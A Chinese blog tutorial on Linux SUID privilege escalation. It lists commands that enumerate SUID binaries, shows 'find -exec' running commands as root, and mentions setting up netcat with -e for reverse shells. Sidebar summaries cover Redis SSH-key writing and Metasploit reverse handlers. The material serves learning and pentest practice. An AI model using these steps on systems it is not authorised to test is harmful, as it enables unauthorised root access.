Linux之SUID提权

最新推荐文章于 2023-07-28 20:47:24 发布
最新推荐文章于 2023-07-28 20:47:24 发布
阅读量733 收藏
点赞数
分类专栏: 漏洞提权 渗透测试 文章标签: linux 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/108214942
版权
0x00 SUID是什么?

SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root
 

0x01 suid提权

运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)

搜索符合条件的可以用来提权的:(三种都可以)

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -user root -perm -4000 -print 2>/dev/null

搜索可以提权的程序,一般有以下 :

nmap vim find Bash More Less Nano cp
0x011 find命令提权

先看看当前权限

在这里插入图片描述
看看哪些命令是以suid权限执行

find / -perm -u=s -type f 2>/dev/null

发现find可以利用
在这里插入图片描述
需要配合find命令(寻找文件)。所以先创建个测试文件吧
(普通用户的话,进入到/tmp目录下,然后新建一个文件)

touch test
find test -exec whoami \;

执行find命令,并查看当前权限。会发现已经是root权限
在这里插入图片描述
 

0x02 小扩展?

迟来的道歉和修改!
/bin/bash 换成 /bin/sh 即可,权限则仍然是root

想试试这样反弹shell之后会是什么权限(结果令人失望)
1.尝试用bash
在这里插入图片描述
2.尝试用nc
Tips~
ubuntu 16.04需要修改默认nc为传统nc。为什么修改,因为自带的nc不能反向shell
安装传统nc

sudo apt -y install netcat-traditional

修改系统默认nc为传统nc,可用-e选项

sudo update-alternatives --config nc

(原以为跟正反向有关系,结果…)
在这里插入图片描述
 
GOT IT!
总的来说。suid提权是短暂的,能帮我们以root权限执行指定的命令

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux使用suid vim.basic文件实现提权
09-14
主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7238
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
suid提权
m0_62207170的博客
02-28 243
suid提权
红队笔记之Suid提权浅析与利用方法总结
明光札记
12-22 3778
suid提权原理介绍,以及具体提权方法总结
[内网渗透]SUID提权
leekos的博客,分享web安全相关知识~
07-28 315
suid(set uid)是linux中的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义在执行过程中,调用者会暂时获得该文件的属主权限,且该权限只在程序执行的过程中有效。通俗的来讲,假设我们现在有一个可执行文件/bin/find,其属主为root。当我们通过非root用户登录时,如果。
[内网渗透]oscp(SUID提权)
leekos的博客,分享web安全相关知识~
07-20 183
命令时,应谨慎行事,确保只在必要的情况下使用超级用户权限,并仔细验证和审查要执行的命令,以防止意外或不安全的操作。SUID可以让程序调用者以文件拥有者的身份运行该文件,当我们以一个普通用户去运行一个root用户所有的SUID文件,那么运行该文件我们就可以获取到root权限。需要在脚本中以特权身份运行某些命令:如果您正在编写一个Shell脚本,并且需要在脚本中执行一些需要特权的命令,可以将。这样做后,您可以在该特权的Bash shell中运行命令,拥有更高的系统权限。需要注意的是,在使用。
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
Linux被曝出SUDO提权漏洞,幸好影响不大
NOSEC2019的博客
10-15 2372
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root权限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
SUID提权
snowlyzz的博客
08-14 1704
久经不衰的SUID提权
Linux提权SUID提权
CP1024的博客
04-04 3667
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制文件 2. 命令执行者要有二进制文件的执行权 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
【学习笔记】常见的提权方式
chualam的博客
10-29 1144
提权linux 内核提权 配置错误提权(用dirtycow提权) windows 系统漏洞提权 msf 前提:已经通过nc -lvv 监听 find /usr/bin -perm -us=s usid权限文件查询 ls -la /usr/bin/passwd 看到-rwsr-xr-x 1 说明存在suid位 如何提权?用vim.basic提权(可以编辑root才能运行的文件) 然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式sh...
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权suid提权、定时任务提权、sudo提权等等)
linux提权总结8大类型,30多种方式
最新发布
09-27
linux提权总结8大类型,30多种方式 小白也能看明白的提权方法,包括内核提权,服务提权 sudo提权 suid提权sgid提权 定时任务提权 nfs提权 等待
linuxSUID,SGID与SBIT的奇妙用途详解
09-15
主要给大家介绍了关于linuxSUID,SGID与SBIT的奇妙用途的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用linux具有一定的参考学习价值,需要的朋友们下面随着小编来一起看看吧
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3994
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
HTA(html应用程序)攻击
Zlirving_的博客
02-23 3560
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 1882
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
CS与MSF联动之派生会话
Zlirving_的博客
02-19 1606
CS 派生会话到MSF 当我们CS上线后,先打开msf,启动监听模块 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost xxxx set lport xxxx exploit 然后在CS新建一个外部监听 两边的payload协议一定要对应的 然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听 MSF 派生会话给CS 先在 cs 开启监听,Cobalt Strike-&g
linux suid提权
03-16
SUID是一种特殊的权限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的权限来执行,而不是以执行者的权限来执行。这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统中,SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID提权攻击,管理员应该定期检查系统中的SUID文件,并限制它们的使用权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值